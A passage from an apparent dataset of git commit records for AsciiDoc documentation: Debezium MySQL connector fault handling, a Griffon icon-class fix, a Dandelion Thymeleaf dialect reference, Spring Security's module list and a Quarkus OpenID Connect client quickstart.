Typically events are skipped due to a malformed or unparseable event from MySQL's binlog.\n\n|`NumberOfDisconnects`\n|`long`\n|The number of disconnects by the MySQL connector.\n\n|`NumberOfRolledBack{zwsp}Transactions`\n|`long`\n|The number of processed transactions that were rolled back and not streamed.\n\n|`NumberOfNotWell{zwsp}FormedTransactions`\n|`long`\n|The number of transactions that have not conformed to the expected protocol of `BEGIN` + `COMMIT`\/`ROLLBACK`. This value should be `0` under normal conditions.\n\n|`NumberOfLarge{zwsp}Transactions`\n|`long`\n|The number of transactions that have not fit into the look-ahead buffer. For optimal performance, this value should be significantly smaller than `NumberOfCommittedTransactions` and `NumberOfRolledBackTransactions`.\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mysql-connector-schema-history\n\/\/ Title: Monitoring {prodname} MySQL connector schema history\n[[mysql-monitoring-schema-history]]\n[[mysql-schema-history-metrics]]\n=== Schema history metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} MySQL connectors handle faults and problems\n[[mysql-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. When the system is operating normally or being managed carefully, {prodname} provides _exactly once_ delivery of every change event record. \n\nIf a fault does happen, the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nDetails are in the following sections: \n\n* xref:debezium-mysql-connector-configuration-and-startup-errors[]\n* xref:mysql-becomes-unavailable-while-debezium-is-running[]\n* xref:debezium-mysql-kafka-connect-process-stops-gracefully[]\n* xref:debezium-mysql-kafka-connect-process-crashes[]\n* xref:debezium-mysql-kafka-process-becomes-unavailable[]\n* xref:mysql-purges-binlog-files-used-by-debezium[]\n\nendif::product[]\n\n[id=\"debezium-mysql-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error or exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to the MySQL server by using the specified connection parameters.\n* The connector is attempting to restart at a position in the binlog for which MySQL no longer has the history available.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. 
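For example (a hypothetical case), a configuration whose `database.hostname` points to an unreachable host causes the connector to fail at startup with a connection error. 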
After you correct the configuration or address the MySQL problem, restart the connector.\n\n[id=\"mysql-becomes-unavailable-while-debezium-is-running\"]\n=== MySQL becomes unavailable\n\nIf your MySQL server becomes unavailable, the {prodname} MySQL connector fails with an error and the connector stops. When the server is available again, restart the connector.\n\nHowever, if GTIDs are enabled for a highly available MySQL cluster, you can restart the connector immediately. It will connect to a different MySQL server in the cluster, find the location in the server's binlog that represents the last transaction, and begin reading the new server's binlog from that specific location.\n\nIf GTIDs are not enabled, the connector records the binlog position of only the MySQL server to which it was connected. To restart from the correct binlog position, you must reconnect to that specific server.\n\n[id=\"debezium-mysql-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect stops gracefully\n\nWhen Kafka Connect stops gracefully, there is a short delay while the {prodname} MySQL connector tasks are stopped and restarted on new Kafka Connect processes.\n\n[id=\"debezium-mysql-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf Kafka Connect crashes, the process stops and any {prodname} MySQL connector tasks terminate without their most recently-processed offsets being recorded. In distributed mode, Kafka Connect restarts the connector tasks on other processes. However, the MySQL connector resumes from the last offset recorded by the earlier processes. This means that the replacement tasks might generate some of the same events processed prior to the crash, creating duplicate events.\n\nEach change event message includes source-specific information that you can use to identify duplicate events, for example: \n\n* Event origin\n* MySQL server's event time\n* The binlog file name and position\n* GTIDs (if used)\n\n[id=\"debezium-mysql-kafka-process-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nThe Kafka Connect framework records {prodname} change events in Kafka by using the Kafka producer API. If the Kafka brokers become unavailable, the {prodname} MySQL connector pauses until the connection is reestablished and the connector resumes where it left off.\n\n[id=\"mysql-purges-binlog-files-used-by-debezium\"]\n=== MySQL purges binlog files\n\nIf the {prodname} MySQL connector stops for too long, the MySQL server purges older binlog files and the connector's last position may be lost. When the connector is restarted, the MySQL server no longer has the starting point and the connector performs another initial snapshot. If the snapshot is disabled, the connector fails with an error.\n\nSee {link-prefix}:{link-mysql-connector}#mysql-snapshots[snapshots] for details about how MySQL connectors perform initial snapshots.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"37272c9a04af8a21633315facfd80ef219a4c0ac","subject":"Guide points to broken classnames. Fix #1","message":"Guide points to broken classnames. 
Fix #1\n","repos":"griffon-plugins\/griffon-silkicons-plugin","old_file":"subprojects\/griffon-silkicons-guide\/src\/asciidoc\/usage.adoc","new_file":"subprojects\/griffon-silkicons-guide\/src\/asciidoc\/usage.adoc","new_contents":"\n[[_usage]]\n= Usage\n\n== Swing\n\nThe `griffon-silk-swing:{project-version}` JAR provides a new Icon class: `{api_link_silkicon_swing}`.\nYou may use this class with any Swing component that supports an Icon property.\n\n== JavaFX\n\nThe `griffon-silk-javafx:{project-version}` JAR provides a subclass of `Image`: `{api_link_silkicon_javafx}`.\nYou may use this class with any JavaFX control that accepts a graphic property, as long as you wrap the icon with\nan `ImageView` instance.\n\n== Action Resources\n\nAction icons can be set using resources files if the following format is used:\n\n[source]\n----\niconClassName|description\n----\n\nHere's an example using the Swing icon\n\n[source,java,options=\"nowrap\"]\n.griffon-app\/i18n\/messages.properties\n----\norg.example.AppController.action.Preferences.icon=griffon.swing.support.silkicons.SilkIcon|star\n----\n\nThe JavaFX version for the same icon value is\n\n[source,java,options=\"nowrap\"]\n.griffon-app\/i18n\/messages.properties\n----\norg.example.AppController.action.Preferences.icon=griffon.javafx.support.silkicons.SilkIcon|star\n----\n","old_contents":"\n[[_usage]]\n= Usage\n\n== Swing\n\nThe `griffon-silk-swing:{project-version}` JAR provides a new Icon class: `{api_link_silkicon_swing}`.\nYou may use this class with any Swing component that supports an Icon property.\n\n== JavaFX\n\nThe `griffon-silk-javafx:{project-version}` JAR provides a subclass of `Image`: `{api_link_silkicon_javafx}`.\nYou may use this class with any JavaFX control that accepts a graphic property, as long as you wrap the icon with\nan `ImageView` instance.\n\n== Action Resources\n\nAction icons can be set using resources files if the following format is used:\n\n[source]\n----\niconClassName|description\n----\n\nHere's an example using the Swing icon\n\n[source,java,options=\"nowrap\"]\n.griffon-app\/i18n\/messages.properties\n----\norg.example.AppController.action.Preferences.icon=griffon.swing.support.silk.SilkIcon|star\n----\n\nThe JavaFX version for the same icon value is\n\n[source,java,options=\"nowrap\"]\n.griffon-app\/i18n\/messages.properties\n----\norg.example.AppController.action.Preferences.icon=griffon.javafx.support.silk.SilkIcon|star\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f5b06b5c8ab54ad8d563dd5327089d064b416d81","subject":"[Docs] Added the new Thymeleaf dialect reference","message":"[Docs] Added the new Thymeleaf dialect reference\n","repos":"pioto\/dandelion,pioto\/dandelion,pioto\/dandelion","old_file":"dandelion-docs\/src\/asciidoc\/_includes\/reference-thymeleaf-dialect.adoc","new_file":"dandelion-docs\/src\/asciidoc\/_includes\/reference-thymeleaf-dialect.adoc","new_contents":"== Appendix B: Thymeleaf dialect reference\n\n=== B.1. 
`ddl:bundle*` attributes\n\nThe `ddl:bundle*` attributes allow you to include bundles in (or exclude them from) the current HTTP request.\n\n[discrete]\n==== Usage\n\nIn order to include a bundle to the current HTTP request, use the `ddl:bundle-includes` attribute as follows:\n\n[source, html]\n----\n<!DOCTYPE html>\n<html xmlns:th=\"http:\/\/www.thymeleaf.org\" xmlns:ddl=\"http:\/\/www.thymeleaf.org\/dandelion\">\n <head ddl:bundle-includes=\"bundle-to-include, another-bundle-to-include\">\n ...\n <\/head>\n <body>\n ...\n <\/body>\n<\/html>\n----\n\nIn the same way, use the `ddl:bundle-excludes` attribute as follows to exclude a bundle from the current HTTP request:\n\n[source, html]\n----\n<!DOCTYPE html>\n<html xmlns:th=\"http:\/\/www.thymeleaf.org\" xmlns:ddl=\"http:\/\/www.thymeleaf.org\/dandelion\">\n <head ddl:bundle-excludes=\"bundle-to-exclude\">\n ...\n <\/head>\n <body>\n ...\n <\/body>\n<\/html>\n----\n\nTIP: Both `ddl:bundle-includes` and `ddl:bundle-excludes` attributes can be used on *any HTML tag*.\n\n[discrete]\n==== Reference\n\n.`ddl:bundle*` attributes reference\n[cols=\"2,8\"]\n|===\n|Attribute |Description\n\n|[[jsp-bundle-includes]]*ddl:bundle-includes*\n|Comma-separated list of bundles to include in the current HTTP request\n\n|[[jsp-bundle-excludes]]*ddl:bundle-excludes*\n|Comma-separated list of bundles to exclude from the current HTTP request\n|===\n\n=== B.2. `ddl:asset*` attributes\n\nThe `ddl:asset*` attributes allow you to exclude assets (JS and\/or CSS) from the current HTTP request.\n\n[discrete]\n==== Usage\n\nIn order to exclude one JS asset from the current request, use the `ddl:asset-js-excludes` as follows:\n\n[source, html]\n----\n<!DOCTYPE html>\n<html xmlns:th=\"http:\/\/www.thymeleaf.org\" xmlns:ddl=\"http:\/\/www.thymeleaf.org\/dandelion\">\n <head>\n ...\n <\/head>\n <body ddl:asset-js-excludes=\"js-asset-to-exclude, another-js-asset-to-exclude\">\n ...\n <\/body>\n<\/html>\n----\n\nAnd in order to exclude one CSS asset from the current HTTP request, use the `ddl:asset-css-excludes` as follows:\n\n[source, html]\n----\n<!DOCTYPE html>\n<html xmlns:th=\"http:\/\/www.thymeleaf.org\" xmlns:ddl=\"http:\/\/www.thymeleaf.org\/dandelion\">\n <head>\n ...\n <\/head>\n <body ddl:asset-css-excludes=\"css-asset-to-exclude\">\n ...\n <\/body>\n<\/html>\n----\n\nTIP: As `ddl:bundle*` attributes, `ddl:asset*` attributes can be used on *any HTML tag*.\n\n[discrete]\n==== Reference\n\n.`ddl:asset*` attributes reference\n[cols=\"2,8\"]\n|===\n|Attribute |Description\n\n|[[jsp-asset-js-excludes]]*ddl:asset-js-excludes*\n|Comma-separated list of JS asset names to exclude from the current HTTP request\n\n|[[jsp-asset-css-excludes]]*ddl:asset-css-excludes*\n|Comma-separated list of CSS asset names to exclude from the current HTTP request\n|===\n","old_contents":"== Appendix B: Thymeleaf dialect reference\n\n=== B.1. `ddl:bundle*` attributes\n\n=== B.2. 
`ddl:asset*` attributes\n\n\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"35797f9a745b9ebf1225bf46929296622aa8a94e","subject":"Add Resource Server to Modules Section","message":"Add Resource Server to Modules Section\n\nFixes gh-7498\n","repos":"jgrandja\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,fhanik\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,fhanik\/spring-security,rwinch\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,rwinch\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,djechelon\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/about\/modules.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/about\/modules.adoc","new_contents":"\/\/ FIXME: This might make sense in Getting Spring Security along with the artifact information\n\n[[modules]]\n= Project Modules\nIn Spring Security 3.0, the codebase was sub-divided into separate jars which more clearly separate different functionality areas and third-party dependencies.\nIf you use Maven to build your project, these are the modules you should add to your `pom.xml`.\nEven if you do not use Maven, we recommend that you consult the `pom.xml` files to get an idea of third-party dependencies and versions.\nAnother good idea is to examine the libraries that are included in the sample applications.\n\n\n[[spring-security-core]]\n== Core -- `spring-security-core.jar`\nThis module contains core authentication and access-control classes and interfaces, remoting support, and basic provisioning APIs.\nIt is required by any application that uses Spring Security.\nIt supports standalone applications, remote clients, method (service layer) security, and JDBC user provisioning.\nIt contains the following top-level packages:\n\n* `org.springframework.security.core`\n* `org.springframework.security.access`\n* `org.springframework.security.authentication`\n* `org.springframework.security.provisioning`\n\n[[spring-security-remoting]]\n== Remoting -- `spring-security-remoting.jar`\nThis module provides integration with Spring Remoting.\nYou do not need this unless you are writing a remote client that uses Spring Remoting.\nThe main package is `org.springframework.security.remoting`.\n\n\n[[spring-security-web]]\n== Web -- `spring-security-web.jar`\nThis module contains filters and related web-security infrastructure code.\nIt contains anything with a servlet API dependency.\nYou need it if you require Spring Security web authentication services and URL-based access-control.\nThe main package is `org.springframework.security.web`.\n\n\n[[spring-security-config]]\n== Config -- `spring-security-config.jar`\nThis module contains the security namespace parsing code and Java configuration code.\nYou need it if you use the Spring Security XML namespace for configuration or Spring Security's Java Configuration support.\nThe main package is `org.springframework.security.config`.\nNone of the classes are intended for direct use in an 
application.\n\n\n[[spring-security-ldap]]\n== LDAP -- `spring-security-ldap.jar`\nThis module provides LDAP authentication and provisioning code.\nIt is required if you need to use LDAP authentication or manage LDAP user entries.\nThe top-level package is `org.springframework.security.ldap`.\n\n\n[[spring-security-oauth2-core]]\n== OAuth 2.0 Core -- `spring-security-oauth2-core.jar`\n`spring-security-oauth2-core.jar` contains core classes and interfaces that provide support for the OAuth 2.0 Authorization Framework and for OpenID Connect Core 1.0.\nIt is required by applications that use OAuth 2.0 or OpenID Connect Core 1.0, such as client, resource server, and authorization server.\nThe top-level package is `org.springframework.security.oauth2.core`.\n\n\n[[spring-security-oauth2-client]]\n== OAuth 2.0 Client -- `spring-security-oauth2-client.jar`\n`spring-security-oauth2-client.jar` contains Spring Security's client support for OAuth 2.0 Authorization Framework and OpenID Connect Core 1.0.\nIt is required by applications that use OAuth 2.0 Login or OAuth Client support.\nThe top-level package is `org.springframework.security.oauth2.client`.\n\n\n[[spring-security-oauth2-jose]]\n== OAuth 2.0 JOSE -- `spring-security-oauth2-jose.jar`\n`spring-security-oauth2-jose.jar` contains Spring Security's support for the JOSE (Javascript Object Signing and Encryption) framework.\nThe JOSE framework is intended to provide a method to securely transfer claims between parties.\nIt is built from a collection of specifications:\n\n* JSON Web Token (JWT)\n* JSON Web Signature (JWS)\n* JSON Web Encryption (JWE)\n* JSON Web Key (JWK)\n\nIt contains the following top-level packages:\n\n* `org.springframework.security.oauth2.jwt`\n* `org.springframework.security.oauth2.jose`\n\n[[spring-security-oauth2-resource-server]]\n== OAuth 2.0 Resource Server -- `spring-security-oauth2-resource-server.jar`\n`spring-security-oauth2-resource-server.jar` contains Spring Security's support for OAuth 2.0 Resource Servers.\nIt is used to protect APIs via OAuth 2.0 Bearer Tokens.\nThe top-level package is `org.springframework.security.oauth2.server.resource`.\n\n[[spring-security-acl]]\n== ACL -- `spring-security-acl.jar`\nThis module contains a specialized domain object ACL implementation.\nIt is used to apply security to specific domain object instances within your application.\nThe top-level package is `org.springframework.security.acls`.\n\n\n[[spring-security-cas]]\n== CAS -- `spring-security-cas.jar`\nThis module contains Spring Security's CAS client integration.\nYou should use it if you want to use Spring Security web authentication with a CAS single sign-on server.\nThe top-level package is `org.springframework.security.cas`.\n\n\n[[spring-security-openid]]\n== OpenID -- `spring-security-openid.jar`\nThis module contains OpenID web authentication support.\nIt is used to authenticate users against an external OpenID server.\nThe top-level package is `org.springframework.security.openid`.\nIt requires OpenID4Java.\n\n\n[[spring-security-test]]\n== Test -- `spring-security-test.jar`\nThis module contains support for testing with Spring Security.\n","old_contents":"\/\/ FIXME: This might make sense in Getting Spring Security along with the artifact information\n\n[[modules]]\n= Project Modules\nIn Spring Security 3.0, the codebase was sub-divided into separate jars which more clearly separate different functionality areas and third-party dependencies.\nIf you use Maven to build your project, these are the modules you 
should add to your `pom.xml`.\nEven if you do not use Maven, we recommend that you consult the `pom.xml` files to get an idea of third-party dependencies and versions.\nAnother good idea is to examine the libraries that are included in the sample applications.\n\n\n[[spring-security-core]]\n== Core -- `spring-security-core.jar`\nThis module contains core authentication and access-contol classes and interfaces, remoting support, and basic provisioning APIs.\nIt is required by any application that uses Spring Security.\nIt supports standalone applications, remote clients, method (service layer) security, and JDBC user provisioning.\nIt contains the following top-level packages:\n\n* `org.springframework.security.core`\n* `org.springframework.security.access`\n* `org.springframework.security.authentication`\n* `org.springframework.security.provisioning`\n\n[[spring-security-remoting]]\n== Remoting -- `spring-security-remoting.jar`\nThis module provides integration with Spring Remoting.\nYou do not need this unless you are writing a remote client that uses Spring Remoting.\nThe main package is `org.springframework.security.remoting`.\n\n\n[[spring-security-web]]\n== Web -- `spring-security-web.jar`\nThis module contains filters and related web-security infrastructure code.\nIt contains anything with a servlet API dependency.\nYou need it if you require Spring Security web authentication services and URL-based access-control.\nThe main package is `org.springframework.security.web`.\n\n\n[[spring-security-config]]\n== Config -- `spring-security-config.jar`\nThis module contains the security namespace parsing code and Java configuration code.\nYou need it if you use the Spring Security XML namespace for configuration or Spring Security's Java Configuration support.\nThe main package is `org.springframework.security.config`.\nNone of the classes are intended for direct use in an application.\n\n\n[[spring-security-ldap]]\n== LDAP -- `spring-security-ldap.jar`\nThis module provides LDAP authentication and provisioning code.\nIt is required if you need to use LDAP authentication or manage LDAP user entries.\nThe top-level package is `org.springframework.security.ldap`.\n\n\n[[spring-security-oauth2-core]]\n== OAuth 2.0 Core -- `spring-security-oauth2-core.jar`\n`spring-security-oauth2-core.jar` contains core classes and interfaces that provide support for the OAuth 2.0 Authorization Framework and for OpenID Connect Core 1.0.\nIt is required by applications that use OAuth 2.0 or OpenID Connect Core 1.0, such as client, resource server, and authorization server.\nThe top-level package is `org.springframework.security.oauth2.core`.\n\n\n[[spring-security-oauth2-client]]\n== OAuth 2.0 Client -- `spring-security-oauth2-client.jar`\n`spring-security-oauth2-client.jar` contains Spring Security's client support for OAuth 2.0 Authorization Framework and OpenID Connect Core 1.0.\nIt is required by applications that use OAuth 2.0 Login or OAuth Client support.\nThe top-level package is `org.springframework.security.oauth2.client`.\n\n\n[[spring-security-oauth2-jose]]\n== OAuth 2.0 JOSE -- `spring-security-oauth2-jose.jar`\n`spring-security-oauth2-jose.jar` contains Spring Security's support for the JOSE (Javascript Object Signing and Encryption) framework.\nThe JOSE framework is intended to provide a method to securely transfer claims between parties.\nIt is built from a collection of specifications:\n\n* JSON Web Token (JWT)\n* JSON Web Signature (JWS)\n* JSON Web Encryption (JWE)\n* JSON Web Key (JWK)\n\nIt 
contains the following top-level packages:\n\n* `org.springframework.security.oauth2.jwt`\n* `org.springframework.security.oauth2.jose`\n\n\n[[spring-security-acl]]\n== ACL -- `spring-security-acl.jar`\nThis module contains a specialized domain object ACL implementation.\nIt is used to apply security to specific domain object instances within your application.\nThe top-level package is `org.springframework.security.acls`.\n\n\n[[spring-security-cas]]\n== CAS -- `spring-security-cas.jar`\nThis module contains Spring Security's CAS client integration.\nYou should use it if you want to use Spring Security web authentication with a CAS single sign-on server.\nThe top-level package is `org.springframework.security.cas`.\n\n\n[[spring-security-openid]]\n== OpenID -- `spring-security-openid.jar`\nThis module contains OpenID web authentication support.\nIt is used to authenticate users against an external OpenID server.\nThe top-level package is `org.springframework.security.openid`.\nIt requires OpenID4Java.\n\n\n[[spring-security-test]]\n== Test -- `spring-security-test.jar`\nThis module contains support for testing with Spring Security.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5cbe7cdfe4ab1a29b416f6818acabc56a9707e6","subject":"Incorporate quickstart changes in security-openid-connect-client guide","message":"Incorporate quickstart changes in security-openid-connect-client guide\n\nhttps:\/\/github.com\/quarkusio\/quarkus-quickstarts\/pull\/1140 renamed two classes and two fields so that the demo more clearly communicates the usage of the RequestFilters.\n\nSigned-off-by: Harald Albers <64b2b6d12bfe4baae7dad3d018f8cbf6b0e7a044@albersweb.de>\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/security-openid-connect-client.adoc","new_file":"docs\/src\/main\/asciidoc\/security-openid-connect-client.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= OpenID Connect Client and Token Propagation Quickstart\n\ninclude::.\/attributes.adoc[]\n:toc:\n\nThis quickstart demonstrates how to use `OpenID Connect Client Reactive Filter` to acquire and propagate access tokens as `HTTP Authorization Bearer` access tokens, alongside `OpenID Token Propagation Reactive Filter` which propagates the incoming `HTTP Authorization Bearer` access tokens.\n\nPlease check xref:security-openid-connect-client-reference.adoc[OpenID Connect Client and Token Propagation Reference Guide] for all the information related to `Oidc Client` and `Token Propagation` support in Quarkus.\n\nPlease also read xref:security-openid-connect.adoc[Using OpenID Connect to Protect Service Applications] guide if you need to protect your applications using Bearer Token Authorization.\n\n== Prerequisites\n\n:prerequisites-docker:\ninclude::{includes}\/prerequisites.adoc[]\n* https:\/\/stedolan.github.io\/jq\/[jq tool]\n\n== Architecture\n\nIn this example, we will build an application which consists of two JAX-RS resources, `FrontendResource` and `ProtectedResource`. 
`FrontendResource` propagates access tokens to `ProtectedResource` and uses either `OpenID Connect Client Reactive Filter` to acquire a token first before propagating it or `OpenID Token Propagation Reactive Filter` to propagate the incoming, already existing access token.\n\n`FrontendResource` has 4 endpoints:\n\n* `\/frontend\/user-name-with-oidc-client-token`\n* `\/frontend\/admin-name-with-oidc-client-token`\n* `\/frontend\/user-name-with-propagated-token`\n* `\/frontend\/admin-name-with-propagated-token`\n\n`FrontendResource` will use REST Client with `OpenID Connect Client Reactive Filter` to acquire and propagate an access token to `ProtectedResource` when either `\/frontend\/user-name-with-oidc-client-token` or `\/frontend\/admin-name-with-oidc-client-token` is called. And it will use REST Client with `OpenID Connect Token Propagation Reactive Filter` to propagate the current incoming access token to `ProtectedResource` when either `\/frontend\/user-name-with-propagated-token` or `\/frontend\/admin-name-with-propagated-token` is called.\n\n`ProtectedResource` has 2 endpoints:\n\n* `\/protected\/userName`\n* `\/protected\/adminName`\n\nBoth of these endpoints return the username extracted from the incoming access token which was propagated to `ProtectedResource` from `FrontendResource`. The only difference between these endpoints is that calling `\/protected\/userName` is only allowed if the current access token has a `user` role and calling `\/protected\/adminName` is only allowed if the current access token has an `admin` role.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `security-openid-connect-client-quickstart` {quickstarts-tree-url}\/security-openid-connect-client-quickstart[directory].\n\n== Creating the Maven Project\n\nFirst, we need a new project. 
Create a new project with the following command:\n\n:create-app-artifact-id: security-openid-connect-client-quickstart\n:create-app-extensions: oidc,oidc-client-reactive-filter,oidc-token-propagation-reactive,resteasy-reactive\ninclude::{includes}\/devtools\/create-app.adoc[]\n\nThis command generates a Maven project, importing the `oidc`, `oidc-client-reactive-filter`, `oidc-token-propagation-reactive` and `resteasy-reactive` extensions.\n\nIf you already have your Quarkus project configured, you can add these extensions to your project by running the following command in your project base directory:\n\n:add-extension-extensions: oidc,oidc-client-reactive-filter,oidc-token-propagation-reactive,resteasy-reactive\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nThis will add the following to your build file:\n\n[source,xml,role=\"primary asciidoc-tabs-target-sync-cli asciidoc-tabs-target-sync-maven\"]\n.pom.xml\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc-client-reactive-filter<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc-token-propagation-reactive<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-reactive<\/artifactId>\n<\/dependency>\n----\n\n[source,gradle,role=\"secondary asciidoc-tabs-target-sync-gradle\"]\n.build.gradle\n----\nimplementation(\"io.quarkus:quarkus-oidc\")\nimplementation(\"io.quarkus:quarkus-oidc-client-reactive-filter\")\nimplementation(\"io.quarkus:quarkus-oidc-token-propagation-reactive\")\nimplementation(\"io.quarkus:quarkus-resteasy-reactive\")\n----\n\n== Writing the application\n\nLet's start by implementing `ProtectedResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.annotation.security.RolesAllowed;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport io.quarkus.security.Authenticated;\nimport io.smallrye.mutiny.Uni;\n\nimport org.eclipse.microprofile.jwt.JsonWebToken;\n\n@Path(\"\/protected\")\n@Authenticated\npublic class ProtectedResource {\n\n @Inject\n JsonWebToken principal;\n\n @GET\n @RolesAllowed(\"user\")\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n public Uni<String> userName() {\n return Uni.createFrom().item(principal.getName());\n }\n\n @GET\n @RolesAllowed(\"admin\")\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n public Uni<String> adminName() {\n return Uni.createFrom().item(principal.getName());\n }\n}\n----\n\nAs you can see, `ProtectedResource` returns a name from both the `userName()` and `adminName()` methods. The name is extracted from the current `JsonWebToken`.\n
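\nBecause `ProtectedResource` is annotated with `@Authenticated` and its methods with `@RolesAllowed`, a request that carries no valid bearer token is rejected before any method runs. As a quick sanity check once the application and Keycloak are running, you can observe this directly (the `401` mentioned in the comment is the expected outcome, not quickstart code):\n\n[source,bash]\n----\n# No Authorization header, so Quarkus OIDC rejects the request with 401 Unauthorized\ncurl -i http:\/\/localhost:8080\/protected\/userName\n----\n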
\nNext, let's add a REST Client with `OpenID Connect Client Reactive Filter` and another REST Client with `OpenID Connect Token Propagation Reactive Filter`. `FrontendResource` will use these two clients to call `ProtectedResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport org.eclipse.microprofile.rest.client.annotation.RegisterProvider;\nimport org.eclipse.microprofile.rest.client.inject.RegisterRestClient;\n\nimport io.quarkus.oidc.client.reactive.filter.OidcClientRequestReactiveFilter;\nimport io.smallrye.mutiny.Uni;\n\n@RegisterRestClient\n@RegisterProvider(OidcClientRequestReactiveFilter.class)\n@Path(\"\/\")\npublic interface RestClientWithOidcClientFilter {\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n Uni<String> getUserName();\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n Uni<String> getAdminName();\n}\n----\n\nwhere `RestClientWithOidcClientFilter` will depend on `OidcClientRequestReactiveFilter` to acquire and propagate the tokens, and\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport org.eclipse.microprofile.rest.client.annotation.RegisterProvider;\nimport org.eclipse.microprofile.rest.client.inject.RegisterRestClient;\n\nimport io.quarkus.oidc.token.propagation.reactive.AccessTokenRequestReactiveFilter;\nimport io.smallrye.mutiny.Uni;\n\n@RegisterRestClient\n@RegisterProvider(AccessTokenRequestReactiveFilter.class)\n@Path(\"\/\")\npublic interface RestClientWithTokenPropagationFilter {\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n Uni<String> getUserName();\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n Uni<String> getAdminName();\n}\n----\n\nwhere `RestClientWithTokenPropagationFilter` will depend on `AccessTokenRequestReactiveFilter` to propagate the incoming, already existing tokens.\n\nNote that the `RestClientWithOidcClientFilter` and `RestClientWithTokenPropagationFilter` interfaces are identical. The reason for the duplication is that combining `OidcClientRequestReactiveFilter` and `AccessTokenRequestReactiveFilter` on the same REST Client would cause side effects, because the two filters can interfere with each other. For example, `OidcClientRequestReactiveFilter` may override the token propagated by `AccessTokenRequestReactiveFilter`, or `AccessTokenRequestReactiveFilter` can fail if it is called when no token is available to propagate while `OidcClientRequestReactiveFilter` is expected to acquire a new token instead.\n\nNow let's complete the application by adding `FrontendResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport org.eclipse.microprofile.rest.client.inject.RestClient;\n\nimport io.smallrye.mutiny.Uni;\n\n@Path(\"\/frontend\")\npublic class FrontendResource {\n @Inject\n @RestClient\n RestClientWithOidcClientFilter restClientWithOidcClientFilter;\n\n @Inject\n @RestClient\n RestClientWithTokenPropagationFilter restClientWithTokenPropagationFilter;\n\n @GET\n @Path(\"user-name-with-oidc-client-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getUserNameWithOidcClientToken() {\n return restClientWithOidcClientFilter.getUserName();\n }\n\n @GET\n 
